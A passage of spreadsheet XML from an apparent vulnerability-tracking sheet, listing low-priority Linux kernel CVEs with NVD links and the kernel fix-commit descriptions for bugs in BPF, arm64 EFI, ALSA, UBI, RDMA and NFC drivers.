          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr"/>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, s390: Clear fetch destination on faulting arena atomic
Same missing register clear as on riscv64. A RMW atomic on an arena pointer
is converted to BPF_PROBE_ATOMIC and gets an exception table entry, but
bpf_jit_probe_atomic_pre() only fills in the arena base and the probe
offset, leaving probe-&gt;reg at the -1 that bpf_jit_probe_init() set, which
bpf_jit_probe_post() writes into the entry and ex_handler_bpf() then reads
back as "there is nothing to clear".
That is right for a plain BPF_{ADD,AND,OR,XOR}, which only writes memory,
but an RMW carrying BPF_FETCH also reads the old value into a register:
src_reg for BPF_{ADD,AND,OR,XOR} | BPF_FETCH and BPF_XCHG, and r0 for
BPF_CMPXCHG. So on a fault over an unmapped arena page the program resumes
at the landing pad with whatever that register held before the atomic
instead of the 0 that every other BPF_PROBE_* access delivers.
Fill probe-&gt;reg in from bpf_atomic_load_reg(). Unlike x86-64 and arm64,
s390x does not report arena violations from its exception handler, so there
is no access direction to correct here, only the missing register clear.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90211</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90212</t>
        </is>
      </c>
      <c r="D580" s="5" t="inlineStr"/>
      <c r="E580" s="5" t="inlineStr"/>
      <c r="F580" s="5" t="inlineStr"/>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr"/>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64/efi: Avoid voluntary preemption with efi_mm installed
Gus reports a bad kernel memory access when using software PAN
(CONFIG_ARM64_SW_TTBR0_PAN=y) on a machine with support for EFI runtime
services:
  Unable to handle kernel access to user memory outside uaccess routines
    at virtual address 00000000f322ff30
  Mem abort info:
    ESR = 0x0000000096000004
    FSC = 0x04: level 0 translation fault
  Internal error: Oops: 0000000096000004 [#1]  SMP
  Workqueue: efi_rts_wq efi_call_rts
  pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
  pc : efi_call_rts+0xd8/0x288
  Call trace:
   efi_call_rts+0xd8/0x288 (P)
   process_one_work+0x178/0x4f8
   worker_thread+0x194/0x328
This is because the fpsimd context management code called from
__efi_fpsimd_begin() can preempt voluntarily, returning later to the EFI
code with an incorrect value for TTBR0_EL1 thanks to the deferred mm
switching used by the software PAN implementation.
Since EFI runtime services cannot preempt voluntarily and because the
fpsimd switching code does not rely on the TTBR0_EL1 mappings, simply
reorder the fpsimd switch so that it occurs before we change the
page-table.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90212</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90213</t>
        </is>
      </c>
      <c r="D581" s="5" t="inlineStr"/>
      <c r="E581" s="5" t="inlineStr"/>
      <c r="F581" s="5" t="inlineStr"/>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr"/>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firewire: core: fix memory leak in error path of build_tree()
In the error path of build_tree(), node instances can remain in the local
linked list when the function returns.
Whenever an invalid value is detected in the self ID sequence, each
allocated node instance is either an entry in the linked list or an
entry in the ports array of its parent node. Therefore, the allocate
node instances can be safely released by traversing the linked list from
its head.
Release the remaining node instances with for_each_fw_node() before
returning to the caller.</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90213</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90214</t>
        </is>
      </c>
      <c r="D582" s="5" t="inlineStr"/>
      <c r="E582" s="5" t="inlineStr"/>
      <c r="F582" s="5" t="inlineStr"/>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr"/>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: xilinx: formatter_pcm: fix stream_data leak on open error
In xlnx_formatter_pcm_open(), stream_data is allocated and
adata-&gt;play_stream or adata-&gt;capture_stream is assigned early.  If a
later step, such as snd_pcm_hw_constraint_step() or
snd_pcm_hw_constraint_integer(), fails, the function returns the error
immediately.  ALSA does not call the close callback when open fails, so
stream_data is leaked and the stream pointer is left dangling, pointing
to a substream that ALSA frees.  A later interrupt would then call
snd_pcm_period_elapsed() on the freed substream.
Free stream_data and clear the stream pointer on the error paths.</t>
        </is>
      </c>
      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90214</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90215</t>
        </is>
      </c>
      <c r="D583" s="5" t="inlineStr"/>
      <c r="E583" s="5" t="inlineStr"/>
      <c r="F583" s="5" t="inlineStr"/>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr"/>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: ubi: Release device reference on busy detach
ubi_detach_mtd_dev() obtains a device reference through ubi_get_device()
before checking whether the UBI device is busy. The busy return path drops
ubi-&gt;ref_count but leaves the device reference held, so the device object
cannot be released after a later detach.
Drop the device reference before returning -EBUSY.</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90215</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90216</t>
        </is>
      </c>
      <c r="D584" s="5" t="inlineStr"/>
      <c r="E584" s="5" t="inlineStr"/>
      <c r="F584" s="5" t="inlineStr"/>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr"/>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ubi: Fix rollback for explicit UBI device numbers
ubi_init_attach() rolls back module initialization failures by scanning
ubi_devices[0..i-1], where i is the mtd= parameter index. That assumes
the parameter index matches the UBI device number.
That assumption is not true when mtd= specifies an explicit ubi_num. A
successfully attached device can be stored at a higher ubi_devices[]
slot, and a later failure can miss it during rollback.
Scan the full ubi_devices[] array and detach by the actual array index,
matching the way UBI devices are stored.</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90216</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90217</t>
        </is>
      </c>
      <c r="D585" s="5" t="inlineStr"/>
      <c r="E585" s="5" t="inlineStr"/>
      <c r="F585" s="5" t="inlineStr"/>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr"/>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Compare iterator types during state pruning
An iterator stack slot can be MEM_RCU or PTR_UNTRUSTED. These states
must not be equal, or the verifier can prune an unsafe path.
Compare the pointer type for STACK_ITER slots.</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90217</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90218</t>
        </is>
      </c>
      <c r="D586" s="5" t="inlineStr"/>
      <c r="E586" s="5" t="inlineStr"/>
      <c r="F586" s="5" t="inlineStr"/>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr"/>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cma: Fix WARNING in res_to_rt
syzbot reported a WARN_ON(!res-&gt;dev) in res_to_rt() triggered via
addr_handler() during asynchronous address resolution:
"
WARNING: drivers/infiniband/core/restrack.c:138 at res_to_rt+0x1c4/0x230
CPU#1: kworker/u8:4/59
Modules linked in:
CPU: 1 UID: 0 PID: 59 Comm: kworker/u8:4 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Compute Engine, BIOS Google 07/24/2026
Workqueue: ib_addr process_one_req
RIP: 0010:res_to_rt+0x1c4/0x230 drivers/infiniband/core/restrack.c:138
RSP: 0018:ffffc9000201f850 EFLAGS: 00010293
RAX: ffffffff88d00ce5 RBX: ffff88807f0fd4f8 RCX: ffff88801e6e0000
RDX: 0000000000000000 RSI: ffffffff8fd996f0 RDI: 0000000000000003
RBP: 0000000000000000 R08: ffff88801e6e0000 R09: 000000000000000a
R10: 0000000000000009 R11: 0000000000000000 R12: dffffc0000000000
R13: 1ffff1100fe1fa9f R14: 0000000000000000 R15: 0000000000000003
FS:  0000000000000000(0000) GS:ffff888125012000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00001d559c3d2000 CR3: 0000000077c4c000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 rdma_restrack_add+0x5a/0x8a0 drivers/infiniband/core/restrack.c:236
 addr_handler+0x41a/0x5a0 drivers/infiniband/core/cma.c:3534
 process_one_req+0x2eb/0x540 drivers/infiniband/core/addr.c:624
 process_one_work kernel/workqueue.c:3375 [inline]
 process_scheduled_works+0xc4e/0x1630 kernel/workqueue.c:3458
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3539
 kthread+0x388/0x470 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;
"
In addr_handler(), cma_acquire_dev_by_src_ip() is called to populate
id_priv-&gt;cma_dev and bind the associated ib_device to id_priv-&gt;id.device.
If cma_acquire_dev_by_src_ip() returns an error (non-zero status), the ID
remains unassociated with any RDMA device.
Previously, rdma_restrack_add(&amp;id_priv-&gt;res) was invoked unconditionally
even when cma_acquire_dev_by_src_ip() failed, passing a resource with a
NULL dev pointer and triggering the WARN_ON assertion in res_to_rt().
Fix this by only adding the resource to restrack when acquiring the device
succeeds.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90218</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90219</t>
        </is>
      </c>
      <c r="D587" s="5" t="inlineStr"/>
      <c r="E587" s="5" t="inlineStr"/>
      <c r="F587" s="5" t="inlineStr"/>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr"/>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: Free debugfs on registration failure
c4iw_alloc() creates the per-device debugfs tree (dev-&gt;debugfs_root via
setup_debugfs()), but it is removed only in c4iw_remove(), not in
c4iw_dealloc().  When RDMA device registration fails, the registration
worker's err_dealloc_ctx path calls c4iw_dealloc() directly, bypassing
c4iw_remove(), so the debugfs dentries leak and outlive the freed
c4iw_dev.
Move debugfs_remove_recursive() into c4iw_dealloc() so every path that
frees ctx-&gt;dev also removes its debugfs tree.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90219</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90220</t>
        </is>
      </c>
      <c r="D588" s="5" t="inlineStr"/>
      <c r="E588" s="5" t="inlineStr"/>
      <c r="F588" s="5" t="inlineStr"/>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr"/>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: seq: Don't leak the extension cell pointer in the bounce payload
The bounce_error_event() embeds the failed event in the bounce payload
by pointing data.ext.ptr at it.  When that event is a queued
variable-length event, its own data.ext.ptr holds the address of its
first extension cell, put there by snd_seq_event_dup().  The payload
goes out verbatim through snd_seq_expand_var_event(), so the address
reaches userspace.
That is the same address commit 705dd6dcbc0e ("ALSA: seq: Clear
variable event pointer on read") removed from the event header.  The
read path still clears it there, just above the call that expands the
payload.
Embed a sanitised copy instead, treated exactly as snd_seq_read()
treats the header.  A stack copy is enough because delivery is
synchronous and snd_seq_event_dup() copies before returning.
An unprivileged client reaches this by setting SNDRV_SEQ_FILTER_BOUNCE,
queueing a variable-length event to a port that does not exist and
reading the bounce back.  Eight bytes on 64-bit, from its own pool.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90220</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90221</t>
        </is>
      </c>
      <c r="D589" s="5" t="inlineStr"/>
      <c r="E589" s="5" t="inlineStr"/>
      <c r="F589" s="5" t="inlineStr"/>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr"/>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: fix use of uninitialized memory in CORE_INIT_RSP parsing
nci_core_init_rsp_packet_v1() and nci_core_init_rsp_packet_v2() parse
the CORE_INIT_RSP packet without validating that the skb contains
enough data. A malformed response (e.g. injected via virtual_ncidev)
can declare a large num_supported_rf_interfaces while providing
insufficient data, causing reads of uninitialized slab memory. This
is later used in nci_init_complete_req(), triggering a KMSAN
uninit-value warning.
Add skb length checks before accessing packet fields:
- Validate the skb has at least 1 byte for the status field.
- Validate the skb can hold the fixed-size header before parsing.
- In v2, bounds-check each variable-length rf_interface entry and its
  extension parameters within the parsing loop.
- In v1, verify the skb is large enough for both the variable-length
  rf_interfaces array and the trailing rsp_2 structure.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90221</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90222</t>
        </is>
      </c>
      <c r="D590" s="5" t="inlineStr"/>
      <c r="E590" s="5" t="inlineStr"/>
      <c r="F590" s="5" t="inlineStr"/>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr"/>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: pn533: hold a reference to the request skb during send_frame
__pn533_send_async() publishes the command and then calls
dev-&gt;phy_ops-&gt;send_frame(). Once dev-&gt;cmd is set, an incoming frame
can be matched to this command: the I2C threaded IRQ runs
pn533_recv_frame(), which queues cmd_complete_work, and
pn533_send_async_complete() frees cmd-&gt;req with consume_skb().
On the I2C transport, pn533_i2c_send_frame() still dereferences the same
skb after i2c_master_send() returns, so a completion that races the
send can free the skb while the transport is still using it.
The request skb is owned by the command object and may be freed by
command completion at any time after dev-&gt;cmd is published, so the
transport send path must not assume it stays alive. Hold a temporary
reference to the request skb across the send_frame() call so the
transport always sees a live skb even if completion races the send.
Add a pn533_send_cmd_frame() helper and use it from all three send
paths.</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90222</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90223</t>
        </is>
      </c>
      <c r="D591" s="5" t="inlineStr"/>
      <c r="E591" s="5" t="inlineStr"/>
      <c r="F591" s="5" t="inlineStr"/>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="inlineStr"/>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr"/>
      <c r="S591" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: llcp: bound SNL TLV parsing to the skb and add length checks
nfc_llcp_recv_snl() walked the SNL TLV list using a u16 offset/length
pair derived from skb-&gt;len, without bounding reads to the actual skb
data. Three problems followed:
  - For a short frame (skb-&gt;len &lt; LLCP_HEADER_SIZE), tlv_len underflowed.
  - The per-TLV header (type, length) was read without checking that two
    bytes remained.
  - A declared TLV length could run past the end of the buffer, and an
    SDREQ with length == 0 made "service_name_len = length - 1" underflow
    (size_t), driving an out-of-bounds read in the following strncmp() /
    nfc_llcp_sock_from_sn(). The SDRES case likewise read tlv[2]/tlv[3]
    without a length check.
A nearby NFC device can reach this without authentication; LLCP link
activation happens automatically after NFC-DEP.
Walk the TLV list by pointer, bounded by skb_tail_pointer() over the
linear skb data, and validate each TLV declared length before use. Add
explicit length checks for SDREQ (&gt;= 1) and SDRES (exactly 2).
Found by 0sec automated security-research tooling (https://0sec.ai).</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90223</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90224</t>
        </is>
      </c>
      <c r="D592" s="5" t="inlineStr"/>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="inlineStr"/>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr"/>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: fix double completion race in nci_data_exchange_complete
nci_close_device() and nci_rx_work can both call
nci_data_exchange_complete() concurrently.  After commit 4527025d440ce8
("nfc: nci: fix circular locking dependency in nci_close_device") moved
flush_workqueue(ndev-&gt;rx_wq) after mutex_unlock(&amp;ndev-&gt;req_lock),
rx_work is no longer serialized with the explicit completion call in the
close path.  Both callers read the non-NULL callback pointer and invoke
rawsock_data_exchange_complete(), which calls sock_put() -- but only one
sock_hold() was taken, so the second sock_put() underflows the refcount
and frees the socket while it is still in use.
Replace the bare clear_bit(NCI_DATA_EXCHANGE) with
test_and_clear_bit() so that only the first caller proceeds to invoke
the callback.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90224</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
